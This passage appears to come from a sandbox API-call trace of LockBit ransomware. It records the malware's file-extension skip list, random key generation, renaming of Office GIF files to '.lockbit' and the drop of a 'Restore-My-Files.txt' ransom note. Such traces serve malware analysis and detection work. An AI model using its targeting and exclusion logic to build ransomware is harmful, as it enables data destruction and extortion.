lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.444] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.445] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.445] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.445] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.445] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21337_.GIF") returned 1 [0204.445] lstrcmpiW (lpString1="ntldr", lpString2="BD21337_.GIF") returned 1 [0204.445] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21337_.GIF") returned 1 [0204.445] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21337_.GIF") returned 1 [0204.445] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21337_.GIF") returned -1 [0204.446] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21337_.GIF") returned 1 [0204.446] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21337_.GIF") returned 1 [0204.446] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.446] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF") returned=".GIF" [0204.446] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.446] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.446] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.447] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.447] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.447] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.447] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.447] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.447] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF.lockbit") returned 78 [0204.447] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21337_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.448] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.448] malloc (_Size=0x40068) returned 0x3df0008 [0204.448] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=326) returned 1 [0204.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.450] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.454] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.454] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.454] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.454] free (_Block=0x1fa2ed8) [0204.454] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.454] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.454] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.454] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19b11500, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdeeda0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x19b11500, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21339_.GIF", cAlternateFileName="")) returned 1 [0204.454] lstrcmpiW (lpString1=".", lpString2="BD21339_.GIF") returned -1 [0204.455] lstrcmpiW (lpString1="..", lpString2="BD21339_.GIF") returned -1 [0204.455] PathFindExtensionW (pszPath="BD21339_.GIF") returned=".GIF" [0204.455] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.455] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.455] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.456] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.456] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.456] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.456] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.456] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21339_.GIF") returned 1 [0204.456] lstrcmpiW (lpString1="ntldr", lpString2="BD21339_.GIF") returned 1 [0204.456] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21339_.GIF") returned 1 [0204.456] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21339_.GIF") returned 1 [0204.457] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21339_.GIF") returned -1 [0204.457] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21339_.GIF") returned 1 [0204.457] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21339_.GIF") returned 1 [0204.457] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.457] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF") returned=".GIF" [0204.457] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.457] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.457] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.458] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.458] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.458] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.458] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.458] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.458] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.458] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF.lockbit") returned 78 [0204.458] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21339_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.460] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.460] malloc (_Size=0x40068) returned 0x3df0008 [0204.460] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=108) returned 1 [0204.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.462] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.466] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.466] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.466] free (_Block=0x1fa2ed8) [0204.466] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.466] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.466] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.467] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d01a600, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbce14f00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8d01a600, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x10a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21342_.GIF", cAlternateFileName="")) returned 1 [0204.467] lstrcmpiW (lpString1=".", lpString2="BD21342_.GIF") returned -1 [0204.467] lstrcmpiW (lpString1="..", lpString2="BD21342_.GIF") returned -1 [0204.467] PathFindExtensionW (pszPath="BD21342_.GIF") returned=".GIF" [0204.467] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.467] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.467] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.468] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.468] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.468] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.468] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.468] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.468] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.469] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21342_.GIF") returned 1 [0204.469] lstrcmpiW (lpString1="ntldr", lpString2="BD21342_.GIF") returned 1 [0204.469] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21342_.GIF") returned 1 [0204.469] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21342_.GIF") returned 1 [0204.469] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21342_.GIF") returned -1 [0204.469] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21342_.GIF") returned 1 [0204.469] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21342_.GIF") returned 1 [0204.469] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.469] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF") returned=".GIF" [0204.469] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.469] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.469] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.469] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.469] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.470] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.470] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program 